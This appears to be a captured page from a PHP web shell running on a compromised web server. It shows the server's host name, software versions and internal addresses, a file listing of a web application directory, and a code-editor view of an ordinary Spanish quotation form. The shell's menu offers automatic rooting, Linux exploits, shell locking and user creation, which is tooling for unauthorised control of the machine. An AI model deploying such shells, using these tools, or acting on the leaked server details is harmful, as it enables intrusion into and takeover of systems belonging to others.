Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
STR /
administrador /
[ HOME SHELL ]
Name
Size
Permission
Action
cotizaciones.php
4.85
KB
-rwxrwxr-x
index.php
1.13
KB
-rwxrwxr-x
materiales.php
2.78
KB
-rwxrwxr-x
orden.php
1.66
KB
-rwxrwxr-x
servicios.php
2.84
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cotizaciones.php
<!DOCTYPE html> <html lang="en" dir="ltr"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js"></script> <link rel="stylesheet" href="../css/general.css"> <link rel="stylesheet" href="../css/cotizaciones.css"> <script src="../js/controlCotizaciones.js"> </script> <title>STR Cotizaciones</title> </head> <body> <?php include "../componentes/nav.php" ?> <h1 class="titulo">Cotizaciones</h1> <!-- <button class="print" type="button" name="button">print</button> --> <div class="newCot container container-fluid"> <div class="titCot"> <h4>Nueva cotizacion</h4> </div> <div class="cotizacion"> <input class="entrada txtProyecto" type="text" name="proyecto" value="" placeholder="proyecto" required> <input class="entrada txtDesc" type="text" name="descripcion" value="" placeholder="descripcion" required> <input class="entrada txtCliente" type="text" name="cliente" value="" placeholder="cliente" required> <div class=""> entrega:<input class="fecha txtFecha" type="date" name="fecha" value="" > </div> <button type="button" class="btn agMaterial btn-primary" data-toggle="modal" data-target="#modalMaterial" name="button">+ material</button> <button type="button" class="btn agServicio btn-dark" data-toggle="modal" data-target="#modalServicio" name="button">+ servicio</button> <button class="btn btn-success btnGuardarCot" type="button" name="button"><img class="imgGuardar" src="../imagenes/guardar.png"></button> <div class="cotizacion-body"> <table class="tablaMat table "> <h4 class="titTabla">Materiales</h4> <tr> <th>id</th> <th>nombre</th> <th>medida</th> <th>cantidad</th> <th>precio</th> <th>monto</th> </tr> </table> <table class="tablaSer table"> <h4 class="titTabla">Servicios</h4> <tr> <th>id</th> <th>nombre</th> <th>periodo</th> <th>cantidad</th> <th>precio</th> <th>monto</th> </tr> </table> </div> <div class="cotizacion-footer"> <h4 class='gtotal'>Total:$0</h4> </div> </div> <div class="modal fade" id="modalMaterial"> <div class="modal-dialog"> <div class="modal-content modalMaterial"> <!-- Modal Header --> <div class="modal-header"> <h4 class="modal-title">Materiales</h4> <button type="button" class="close" data-dismiss="modal">×</button> </div> <!-- Modal body --> <div class="modal-body bodyMaterial"> <input type="text" class="buscarMaterial" name="" value="" placeholder="buscar material"> <table class="tableMaterialesMod table"> <tr > <th>id</th> <th>nombre</th> <th>cantdad</th> <th>precio</th> </tr> </table> </div> </div> </div> </div> <div class="modal fade" id="modalServicio"> <div class="modal-dialog"> <div class="modal-content modalMaterial"> <!-- Modal Header --> <div class="modal-header"> <h4 class="modal-title">Servicios</h4> <button type="button" class="close" data-dismiss="modal">×</button> </div> <!-- Modal body --> <div class="modal-body bodyMaterial"> <input type="text" class="buscarServicio" name="" value="" placeholder="buscar material"> <table class="tableServMod table"> <tr > <th>id</th> <th>nombre</th> <th>periodos</th> <th>precio</th> </tr> </table> </div> </div> </div> </div> </div> </body> </html>
Close